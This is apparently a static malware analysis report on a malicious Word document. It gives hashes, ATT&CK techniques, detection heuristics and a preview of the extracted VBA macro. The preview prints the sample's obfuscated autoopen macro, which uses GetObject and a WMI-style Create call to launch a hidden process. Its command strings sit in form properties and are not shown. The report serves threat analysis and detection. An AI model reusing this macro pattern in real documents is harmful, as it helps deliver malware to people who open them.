Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a1f1531a79a0d79…

MALICIOUS

Office (OLE)

157.9 KB | Created: 2019-03-22 14:15:00 (taken from the document's own metadata, which is attacker-controlled and not verifiable) | Authoring application: Microsoft Office Word (also from metadata) | First seen: 2019-04-18
MD5: 1cc9fe0345dbb2e288c59021a5fb094e SHA-1: dbd1691eb459ffa2814079753474ab65752f3582 SHA-256: 1a1f1531a79a0d79fa3e30f82919ffc7e7be80f08f467db09db1b9e9edb5690d
Risk score: 222 (the scale and threshold for this score are not stated on this page)

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. An 'autoopen' procedure is present, so the code runs as soon as the document is opened with macros enabled. The procedure starts with 'On Error Resume Next' and is padded with arithmetic on undeclared variables inside If-blocks that appears to be filler for obfuscation rather than functional logic. Its real work is two GetObject calls: the first obtains an object whose ShowWindow property is set to 0 (hidden window), and the second obtains an object on which .Create is invoked with a long concatenated string, a second argument, the first object, and a by-reference output argument. That call shape is consistent with starting a hidden process through WMI (Win32_ProcessStartup plus Win32_Process.Create), which is a common way to launch a downloader command, but every string passed to these calls is assembled from properties of the bwAAQQB object (apparently a UserForm), so the actual moniker and command line are not present in the extracted VBA source and cannot be confirmed by static analysis alone; the secondary-payload behaviour is inferred from this pattern, not observed. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Malware.Dsfj-6905985-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dsfj-6905985-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The generic description of this rule states that no modern VBA project was recovered, which conflicts with the OLE_VBA_MACROS finding above and with the extracted macros.bas artifact; treat this entry only as corroborating evidence of an auto-execution marker, not as a separate WordBasic-only execution path, and not as a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main — in document text (OLE body). This is the standard DrawingML XML namespace identifier found in ordinary Office files; it is not a network indicator and should not be blocked or hunted on. No URL was extracted from the macro code itself, consistent with the command/URL strings being stored in form properties rather than in VBA source.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16199 bytes
SHA-256: 71a3aad5210ba1f705290334e375c39f8347fa1e6c9ab023920b14bc08a33ec3
Preview script
First 1,000 lines of the extracted script
' analyst note: olevba emits one "Attribute VB_Name" header per VBA module in the project.
' Module 1 — VB_Base names Normal.ThisDocument, so this appears to be the document's
' ThisDocument class module (template-derived); no executable statements from it are shown here.
Attribute VB_Name = "McBABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' analyst note: Module 2 — VB_Base is a pair of GUIDs, which is consistent with a UserForm
' module (confirm by inspecting the form's storage in the OLE file). autoopen below reads
' bwAAQQB.Tag and other bwAAQQB.<name> properties to build its GetObject/Create strings,
' so the strings that matter live in this object's properties, not in the VBA source.
Attribute VB_Name = "bwAAQQB"
Attribute VB_Base = "0{083E8E4F-7333-4DE3-975C-87E5BE09DE75}{965B932F-2E98-488C-948A-3A0C546735B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' analyst note: Module 3 — standard module that holds the Sub autoopen entry point that follows.
Attribute VB_Name = "FAUADQw"
Sub autoopen()
On Error Resume Next
   If YADACkA = VADxU_GD Then
   jBDB1XA = CVar(qXDokB)
   C1GwDAAD = (101205095 + Rnd(so__AB4 * _
Tan(708947359 / Chr(124755860 / CDbl(wQ1xBA) * L_xZ4DDX / CDbl(604135494)))) * 178624750 * _
Atn(556091245 / Oct(503255865) - 207074283 * Int(z_AAA1QB)) * (534873275 - Atn(RACDDA)))
   BXADoU = Int(zQBDBxQ - _
MAD_GAZ - 412497414 * Int(603344469))
End If
   If ic1AQxBx = LUAQDo Then
   LXXQDDUU = CVar(NQABwD)
   HcAAQAA = (289389406 + Rnd(jAAAUBXw * _
Tan(652224662 / Chr(31746141 / CDbl(XBADQA) * aAXBAAZ / CDbl(303441909)))) * 662885042 * _
Atn(25240853 / Oct(284925518) - 805380599 * Int(E_ABAAAc)) * (706170682 - Atn(zBZAAUX)))
   PDA_GA = Int(dAADGQA1 - _
z_AQBAcA - 257527050 * Int(9699502))
End If
Set zZoAxAUk = GetObject(bwAAQQB.Tag + bwAAQQB.IQ1AGA1Q + bwAAQQB.Tag)
   If oZGAD_ = YAQD4AA1 Then
   LcU1wDZ = CVar(HAkA1AGo)
   i4AQD1 = (79195545 + Rnd(rAAAo_A * _
Tan(158329816 / Chr(548353451 / CDbl(ikUZZC) * NACADXA / CDbl(991010880)))) * 392771888 * _
Atn(225583305 / Oct(609036624) - 996059843 * Int(wAQAAAX)) * (519478883 - Atn(VUQQoA)))
   wGAQoZ = Int(W_DCC_A - _
wCDxkw - 736633072 * Int(586596545))
End If
   If Uw1AQZA = V1A1AA Then
   FBAUCDAA = CVar(awUwUZ)
   L4UAQxX_ = (484367768 + Rnd(l4ADQD * _
Tan(679210699 / Chr(59517750 / CDbl(sB1BUAk) * uQ_oA_ / CDbl(269071862)))) * 51720181 * _
Atn(21031964 / Oct(21990879) - 509919029 * Int(cCcZBkCB)) * (720245876 - Atn(WDQUwk1A)))
   AAwUx4 = Int(iAUCc1 - _
vAcGAADB - 466987491 * Int(540598761))
End If
   If cAoZcA = J1ZQcADk Then
   EAUUUD = CVar(hAkAAAA)
   sQX1kA4 = (358197078 + Rnd(icAUABQ * _
Tan(153325382 / Chr(514242251 / CDbl(XQCQXA) * zDAZAw / CDbl(359149986)))) * 688224264 * _
Atn(692158750 / Oct(979567079) - 677187710 * Int(LxCABA)) * (380328198 - Atn(NQAUAAwQ)))
   rwQAoZc = Int(uBXBxDw - _
GAADAAAX - 855715159 * Int(407982257))
End If
zZoAxAUk.ShowWindow = 738293 - 738293
   If w411DAUx = O_1ZXACw Then
   JXBDQAA = CVar(OBwA4A)
   vU4D_Z = (87960523 + Rnd(loACoD * _
Tan(670751758 / Chr(14397286 / CDbl(oXZABUcD) * GUBQDA / CDbl(825014073)))) * 887450535 * _
Atn(242824506 / Oct(719087240) - 689504271 * Int(mQAGAUw)) * (547162149 - Atn(tADUBQU_)))
   iCxAB4AB = Int(tDAAQAUU - _
wQQUcAAG - 244463446 * Int(125662189))
End If
   If wAQG_Q = KxUDADk Then
   wDAA4ZU = CVar(mAAAAoUk)
   kCD_kDQ = (544439065 + Rnd(iAAADwX * _
Tan(523204940 / Chr(394316748 / CDbl(H4Qx_U_) * j1cZ4Q4o / CDbl(285257778)))) * 283448523 * _
Atn(65358154 / Oct(946572829) - 491506286 * Int(qGxGUG)) * (885913497 - Atn(BBDBAG)))
   VDUDCA = Int(f1wkA4A - _
KAGAAAAQ - 925752717 * Int(467445725))
End If
   If iBQwZXU = MxQxox_ Then
   UBAUQA = CVar(wAAUZCx)
   VZAxA4w = (106169124 + Rnd(VCAABUA * _
Tan(88096912 / Chr(722804815 / CDbl(CoAkA1Bc) * aA_4C4 / CDbl(248778481)))) * 238025100 * _
Atn(265996728 / Oct(12588907) - 602739977 * Int(D_QQAc)) * (465808297 - Atn(mADAcA)))
   UkABAA = Int(tAQB_D - _
fGG_QQxA - 193560848 * Int(204645670))
End If
GetObject(bwAAQQB.Tag + bwAAQQB.QoAcA_ + bwAAQQB.Tag). _
Create bwAAQQB.Tag + bwAAQQB.OUA1wDC + bwAAQQB.Tag + bwAAQQB.RAGC_QU + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.CAZQABBk + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.G1AAUAAA + bwAAQQB.Tag + bwAAQQB.AADA_A + bwAAQQB.Tag, X4AxQU, zZoAxAUk, bwAAQQB.Tag
   If r_UQQxAZ = aGA4cBAX Then
   tAAA1AoA = CVar(noAZAZc)
   GQGUAw = (594065071 + Rnd(jXA1AA * _
Tan(968045264 / Chr(
... (truncated)